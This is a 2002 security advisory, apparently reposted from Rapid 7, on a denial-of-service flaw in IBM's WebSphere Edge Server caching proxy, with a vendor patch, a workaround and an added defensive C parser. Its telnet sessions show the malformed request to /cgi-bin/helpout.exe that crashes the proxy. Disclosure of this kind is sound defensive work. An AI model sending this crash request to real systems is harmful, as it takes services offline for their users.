24th Oct 2002 [SBWID-5775]
COMMAND
IBM WebSphere Edge Server Caching Proxy Denial of Service
SYSTEMS AFFECTED
IBM Web Traffic Express Caching Proxy Server v4.x (bundled
with IBM WebSphere Edge Server v2.0)
IBM Web Traffic Express Caching Proxy Server v3.6
PROBLEM
In Rapid 7 Advisory [#R7-0007] http://www.rapid7.com/ :
The Caching Proxy component of IBM's WebSphere Edge Server v2.0 is
vulnerable to a denial-of-service attack against one of the default CGI
programs. A malformed HTTP request for /cgi-bin/helpout.exe will cause
ibmproxy.exe to crash and cease functioning.
IBM now bundles Web Traffic Express v4.0 with WebSphere Edge Server
v2.0. IBM Web Traffic Express v3.6 and earlier were separately shipping
products.
Detailed analysis
The proxy server will crash when /cgi-bin/helpout.exe is the subject of
an HTTP request that does not include an HTTP version specifier at the
end of the request line.
If you include a version specifier (e.g. "HTTP/1.0"), helpout.exe will
successfully serve up a blank page.
    [~] $ telnet localhost 80
    Trying 127.0.0.1...
    Connected to proxy.victim.com.
    Escape character is '^]'.
    GET /cgi-bin/helpout.exe HTTP/1.0
    HTTP/1.1 200 Document follows
    Pragma: no-cache
    Last-Modified: Fri, 18 Oct 2002 16:54:40 GMT
    Content-Type: text/html
    Accept-Ranges: bytes
    Connection: close
    Date: Fri, 18 Oct 2002 16:54:40 GMT
    Server: IBM-PROXY-WTE/2.0
    Connection closed by foreign host.
If you send a request with no version specifier, or with a version
specifier that does not include a forward slash (e.g. "HTTP" or ""),
ibmproxy.exe will crash, closing all connections:
    [~] $ telnet localhost 80
    Trying 127.0.0.1...
    Connected to proxy.victim.com.
    Escape character is '^]'.
    GET /cgi-bin/helpout.exe HTTP
    Connection closed by foreign host.
An exception dialog will be displayed on the server console, reading:
    ibmproxy.exe - Application Error
    The instruction at "0x002662ac" referenced memory at "0x00000000". The
    memory could not be "read".
The access violation occurs within the WHTTPD.DLL module.
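The advisory does not show the faulty code in WHTTPD.DLL, so the following is an added example, not IBM's or Rapid 7's code: a C request-line parser that classifies the malformed forms described above (no version token, or a version token without "/") and returns a status instead of assuming the token is present. All function and type names are hypothetical.

```c
#include <ctype.h>
#include <stdio.h>
#include <string.h>

enum req_status { REQ_OK, REQ_SIMPLE, REQ_BAD };  /* hypothetical names */

/* Point *tok at the next space-delimited token, advance *p, return its length. */
static size_t next_token(const char **p, const char **tok)
{
    while (**p == ' ') (*p)++;
    *tok = *p;
    *p += strcspn(*p, " \r\n");
    return (size_t)(*p - *tok);
}

/* Read up to four decimal digits at *s; return -1 when there are none. */
static int digits(const char **s)
{
    int v = -1;
    for (; isdigit((unsigned char)**s) && v < 1000; (*s)++)
        v = (v < 0 ? 0 : v) * 10 + (**s - '0');
    return v;
}

/* Classify "METHOD target [HTTP/x.y]". A line with no version token is an
 * RFC 1945 Simple-Request (REQ_SIMPLE); any other deviation is REQ_BAD. */
enum req_status parse_request_line(const char *line, int *major, int *minor)
{
    const char *p = line, *method, *target, *ver, *extra;
    if (line == NULL) return REQ_BAD;
    size_t mlen = next_token(&p, &method);
    size_t tlen = next_token(&p, &target);
    size_t vlen = next_token(&p, &ver);
    if (mlen == 0 || tlen == 0 || next_token(&p, &extra) != 0)
        return REQ_BAD;                      /* missing or surplus tokens */
    if (vlen == 0)
        return REQ_SIMPLE;                   /* "GET /path": no version at all */
    if (vlen < 8 || strncmp(ver, "HTTP/", 5) != 0)
        return REQ_BAD;                      /* e.g. "HTTP": no slash, no numbers */
    ver += 5;
    if ((*major = digits(&ver)) < 0 || *ver++ != '.' || (*minor = digits(&ver)) < 0)
        return REQ_BAD;
    return strchr(" \r\n", *ver) ? REQ_OK : REQ_BAD;  /* nothing may trail the version */
}

int main(void)
{   /* The two request lines from the advisory's sessions. */
    int mj = 0, mn = 0;
    printf("%d %d\n", parse_request_line("GET /cgi-bin/helpout.exe HTTP/1.0\r\n", &mj, &mn),
           parse_request_line("GET /cgi-bin/helpout.exe HTTP\r\n", &mj, &mn));
}
```

A front-end filter or test harness can use the REQ_BAD result to reject or log such request lines before they reach an unpatched proxy.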
Contact Information
Rapid 7 Security Advisories
Email: advisory@rapid7.com
Web: http://www.rapid7.com/
Phone: +1 (212) 558-8700
SOLUTION
IBM customers should install Caching Proxy efix build 4.0.1.26 or
higher. Efix builds can be downloaded from IBM's secure FTP site. For
more information on obtaining efix builds, contact IBM support with the
APAR number listed under "Vendor status and information" below.
This fix has also been ported back to the Web Traffic Express v3.6 code
base. Customers running v3.6 should contact IBM support for more
information on how to upgrade to a newer build.
As a temporary workaround, you can move the file /cgi-bin/helpout.exe
to a non-executable directory until the fix has been applied.
Vendor status and information
http://www-3.ibm.com/software/webservers/edgeserver/index.html
IBM was notified of this issue and has released efix build number
4.0.1.26 for Caching Proxy Server v4.x, which fixes this issue and
other security issues (see Rapid 7 advisory R7-0008 for more
information: http://www.rapid7.com/advisories/R7-0008.txt ).
IBM is tracking this issue as APAR# IY35970.
Disclaimer and Copyright
Rapid 7, Inc. is not responsible for the misuse of the information
provided in our security advisories. These advisories are a service
to the professional security community. There are NO WARRANTIES
with regard to this information. Any application or distribution of
this information constitutes acceptance AS IS, at the user's own
risk. This information is subject to change without notice.
This advisory Copyright (C) 2002 Rapid 7, Inc. Permission is
hereby granted to redistribute this advisory, providing that no
changes are made and that the copyright notices and disclaimers
remain intact.